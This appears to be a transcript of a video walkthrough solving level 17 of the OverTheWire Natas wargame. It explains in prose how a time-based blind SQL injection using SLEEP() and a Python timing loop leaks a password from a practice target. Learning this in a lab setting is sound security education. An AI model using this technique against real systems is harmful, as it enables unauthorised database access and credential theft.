 What's up everybody? Welcome back to the YouTube video. My name is John Hammond and this video we're looking at level 17 of the Natus war game from over the wire. So on the tails of level 16, we just got the password for level 17. So let's run the script to check out what this web page is and what we're actually working with here. Here we have the form that we've seen before just for logging in it looks like we're given a username input field. And the button will check existence. So kind of the same SQL injection attack we've seen before, but maybe there's something different. So let's actually take a look at the source code and let's see what they're doing here. Just copy that link to the index source. And again, we'll have to de-entitize this and we can remove all those break tags because we don't need those. Alright, so we have the same schema as we've seen before just a user's table with username and password have the same test if we're actually posted to the page in the PHP code. And we run the same query looks like we have the same SQL injection attack vector because they're just concatenating in the username. But it's commented out the output as to whether or not it got a result. So no longer can we determine a yes or no binary dichotomy thing. Does this user exist? Does this user not exist? So we can't use that for our typical blind SQL attack. We won't be able to determine via that yes or no one or zero. Do we have the correct character and what we're trying to leak out? So we have to go through a different attack. And this will be pretty neat. This is when I think one of the coolest things that you can do with with SQL. But let's go ahead and start to post to this web page and see what we can do. We want to change our method to post same URL data will be username. That's the variable that we've got to work with an HTTP and we'll say subscribe blah blah blah post run this. No outputs just like it told us but we know we have our SQL injection. So if I were to change these two single quotes and the original quote the double quote that they're using in that SQL statement we can or one equals one and throw a comment in there. Run this and looks like we're again no real output but we can do some other interesting things. We can actually because we have that SQL injection we can run SQL commands and SQL functions and do SQL things. Let's actually try and sleep for a certain amount of time. So this function will do exactly as it says it will wait or sleep a certain amount of seconds that we pass in here as a number and it will actually operate because we're using that and function. So if something returns and we get this sleep function which will return one if it succeeds or it'll return successful. But the and will mean it will execute if the user that we're checking for according to the application code exists. So let's try this if I hit control B to run it. It returns immediately because obviously the user subscribed does not exist. But if I change this to Natus 718 Natus 18 is the next password that we want. If I hit the go button here the build output there's no response for at least five seconds because we've ended that sleep function. So this gives us the building blocks for a timing attack for time based SQL injection because we can actually leak out the password right. We can say where password we actually don't want to use the where clause because it's already being used for that where username. So we can just say and password is like and use the same methodology that we've been using before. So add in what we've seen of a scene password join of scene password because we'll keep track of that in a list and a character that we iterate through. Don't forget our percent sign here so we get the wildcard and let's change the sleep to two. So let's get that character pool that we want to work with. So let's say characters can equal let's get everything from the string module so we can use lowercase uppercase and digits as we've seen before. Sorry for this duplicate code here guys but now we'll do a while loop or actually we'll do a scene password again to determine the length. Length of scene password is less than 32 because we know that was the length for it. We'll say four character and characters try and get this response here and let's actually just print trying and let's get what we're looking for. We don't need the plus there. We don't have to print that out but I'm going to do this in the command line. Let's change that preference so it looks. Let's run that pipe on not a 17 script and I forgot my colon my bad. Okay so now we're going to start to iterate trying all these characters but X we hang a little bit and we got a test if we actually got a hit if it slept for two seconds or if there is a real difference in the time between one execution in the next. Then we know we've got the correct character because that and password like successfully executed and then sleep will successfully execute. So let's change this and let's start to get a time to determine how long this code takes to run. Let's import time. Let's actually do from time import all so we can just use the time function real easy. So for every character we're looking at we're going to try and send it and then we'll determine what the time currently is start time. We can just do that for debugging purposes and then we can say and time can be the new time after we've already made that request and let's say the difference can equal and time minus start time. So we can get an idea of how long that took difference. Now we can print these things out and while we're watching it difference is maybe 20 tenth of a second but I'll scroll up here. Once we got to X we could tell the difference took more than a second because we slept for that second there. You might have different values on this depending on how your internet connection is because we're literally timing how long this request takes. And that sleep function whatever integer amount of seconds you pass into the sleep function in SQL obviously that will vary. So if I were to run this with two you'll see a different difference because now you're sleeping for two seconds. But since you're going to automate this and weaponize it to actually leak out the password. You want to do something that will give you relatively quick speed but still let you be able to determine what is the threshold for this actually being a successful hit. So we can say if the difference is greater than one then we know we actually have a successful hit. That's the correct character that we've seen in that position of the password. So let's add that to our scene password and break out of this for loop so we can keep moving seen password dot append character we're looking at in the loop and then let's break cool. We don't need this start time notice anymore. Now let's start to loop. What did I do wrong. I think that was happening because nothing was buffering this output here. Now let's try this. We actually have that print statement will tell us the trying and it will determine that X is the correct password. Okay cool. So now we have an attack looks like we're leaking out the password but we forgot the binary notion in the password here so we may be missing capital letters. Let's make sure we include and binary password like so we get case sensitivity when we leak out that field in the database. Now we can let the script run and by the end of it will have the password for Natus 18. All right, I'll let this run and I'll see you in a little bit. So it looks like the script did finish and we have a potential password. Let's head back to the original script and save it as a new one Natus 18. Paste the password in here change the username and let's see if we can just get that page see if we got the correct password and we're ready to move on. Let's control B run this and here we are Natus level 18. Sweet. So we did it. That was the successful loop and pretty much a good Python attack for actually implementing a timing based SQL injection exploit if you want to call it that. And I think that's super cool SQL map does some stuff with that if you haven't seen that tool totally check it out. But I like to consider that methodology pretty good for a timing attack and you'll see those in a lot of catch the flag competitions. And when you don't have explicit SQL injection and you can't get a results easily to determine your blind SQL injection. You can still leak out pieces of the database just by taking a little bit of time using a loop like this. And you can just run with a while true if you don't have this criteria about what you're leaking out about its length or whatever. You can just run forever. And once your loop starts to act weird and gives you like random bites, you know, okay, I pretty much reach the end. So that's it. That's how we can do a timing attack and time based SQL injection and Python and some web hacking. Thank you guys so much for watching. If you do like the video, please click that like button. Please let me know what else you're thinking, what else you'd like to see, what else I could do better with in a comment. If you're willing to subscribe and thank you so much. See you in another video.